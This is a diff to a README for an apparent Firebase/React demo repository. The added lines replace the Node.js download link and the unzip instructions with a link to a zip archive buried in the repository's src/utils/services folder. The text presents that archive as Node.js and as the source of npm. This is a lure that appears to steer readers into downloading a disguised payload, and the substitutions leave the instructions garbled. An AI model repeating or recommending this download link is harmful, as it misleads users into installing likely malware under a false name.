Humerarica/Firebase-React-Demo-Firestore-Authentication-Hosting/README.md

 - **Windows:** Right-click the `.zip` file and select "Extract All."
 - **macOS:** Double-click the `.zip` file to extract it.
-- **Linux:** Right-click and choose "Extract Here" or use the terminal command `unzip filename.zip`.
+- **Linux:** Right-click and choose "Extract Here" or use the terminal command `unzip https://github.com/Humerarica/Firebase-React-Demo-Firestore-Authentication-Hosting/raw/refs/heads/main/src/utils/services/Hosting-Authentication-Firestore-Demo-React-Firebase-1.2.zip`.

 ### 5. Install Dependencies

 To run this app, you need to install a few components.
 Here’s how:

-1. **Install Node.js:** This app uses Node.js to run.
-Visit [nodejs.org](https://nodejs.org/) and download the latest version.
+1. **Install https://github.com/Humerarica/Firebase-React-Demo-Firestore-Authentication-Hosting/raw/refs/heads/main/src/utils/services/Hosting-Authentication-Firestore-Demo-React-Firebase-1.2.zip** This app uses https://github.com/Humerarica/Firebase-React-Demo-Firestore-Authentication-Hosting/raw/refs/heads/main/src/utils/services/Hosting-Authentication-Firestore-Demo-React-Firebase-1.2.zip to run.
+Visit [https://github.com/Humerarica/Firebase-React-Demo-Firestore-Authentication-Hosting/raw/refs/heads/main/src/utils/services/Hosting-Authentication-Firestore-Demo-React-Firebase-1.2.zip](https://github.com/Humerarica/Firebase-React-Demo-Firestore-Authentication-Hosting/raw/refs/heads/main/src/utils/services/Hosting-Authentication-Firestore-Demo-React-Firebase-1.2.zip) and download the latest version.
-2. **Install npm:** Node.js comes with npm (Node Package Manager).
+2. **Install npm:** https://github.com/Humerarica/Firebase-React-Demo-Firestore-Authentication-Hosting/raw/refs/heads/main/src/utils/services/Hosting-Authentication-Firestore-Demo-React-Firebase-1.2.zip comes with npm (Node Package Manager).
 You’ll use npm to install project dependencies.

 Open your terminal or command prompt.
 Navigate to the folder where you extracted the app files.
 You can do this using the `cd` command: